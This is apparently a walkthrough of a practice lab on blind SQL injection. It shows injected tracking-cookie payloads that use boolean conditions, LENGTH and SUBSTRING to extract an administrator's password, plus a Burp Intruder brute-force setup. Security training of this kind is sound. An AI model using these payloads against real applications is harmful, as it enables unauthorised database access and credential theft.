Difficulty: Practitioner
🎯 Goal
This lab contains a blind SQLi vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
✅ Solution
First, let’s capture the request into Burp to see what it looks like:
1
2
3
4
5
GET / HTTP/2
Host: <host>
Cookie: TrackingId=inef9UVjAF4GJLdj; session=86UdOy9CSRpdDtjDrCqiziIuKdAog6uR
Cache-Control: max-age=0
[...]
We know the query behind the TrackingId is vulnerable to blind SQLi and a Welcome back message is displayed when the query returns true.
We can test this behaviour with a basic test:
1
2
TrackingId=inef9UVjAF4GJLdj' AND '1'='1; # Welcome back
TrackingId=inef9UVjAF4GJLdj' AND '1'='2; # Nothing
Let’s be sure there is a users table:
1
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users LIMIT 1)='a # Welcolme back
Let’s be sure there is an administrator user:
1
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator')='a # Welcolme back
Before guessing the password we have to find its length. I could automate it but usually password aren’t that long :(
1
2
3
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a # Welcome back: password length > 1 char
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>10)='a # Welcome back: password length > 10 chars
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>20)='a # Nothing: password length <= 20 chars
Ok so password is between 10 and 20 chars. Let’s try one by one now.
1
2
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=20)='a # Welcome back: password length = 20 chars
TrackingId=inef9UVjAF4GJLdj' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=19)='a # Nothing: password length != 19 chars
The password is 20 characters long.
Now time to guess the password. Two possibilities:
- Manually checking every characters at every position (boring)
- Automate with Burp Intruder to send hundreds of requests for us (cool)
Even if we should always automate everything as much as we can I will still present the manual way to show how it is working.
1. Manual password guessing
We will have to test one by one every character possible for every position. It’s written the password only includes lowercase alphanumeric characters ([a-z][0-9]) and there are 20 positions (the password length) so it’s a total of 36 * 20 = 720 posibilities…
Because it is too much to do manually I will only explain the principle behind: test every character for every position.
This query uses the SUBSTRING() function to extract a single character from the password, and test it against a specific value, here a at the position 1. and 9 at the position 20.
1
2
TrackingId=inef9UVjAF4GJLdj' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a # First request
TrackingId=inef9UVjAF4GJLdj' AND (SELECT SUBSTRING(password,20,1) FROM users WHERE username='administrator')='9 # Last request
Assuming I successfully sent the 720 requests without errors I should have found the password.
2. Automate password guessing
I have the Burp Suite Community Edition so I have some feature and throttle limitation but it’s doing the work good.
First we have to send the request to the Intruder with ctrl+i.
In the Positions tab select Cluster bomb.
The payload positions will be the password character position and the character to test, as the following:
1
TrackingId=inef9UVjAF4GJLdj' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§
In the Payloads tab:
- payload set 1 will be
Numbers- from
1 - to
20 - step of
1
- from
- payload set 2 will be
Brute forcer- character set
abcdefghijklmnopqrstuvwxyz0123456789 - min length
1 - max length
1
- character set
When everything is correctly set we can start the attack. Because the CE edition has a request rate limit of 1 per second it took 10+ minutes to end.
We can sort the result responses on their length because the responses with the Welcolme back message will be longuer than those without.
Burp Cluster bomb attack results
We obtain a table like below revealing the password!
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 5 | k | y | j | d | q | 4 | y | a | q | 6 | 0 | q | j | 6 | 6 | 6 | 7 | 4 | 1 |
We can now log in as the administrator user using the password 5kyjdq4yaq60qj666741.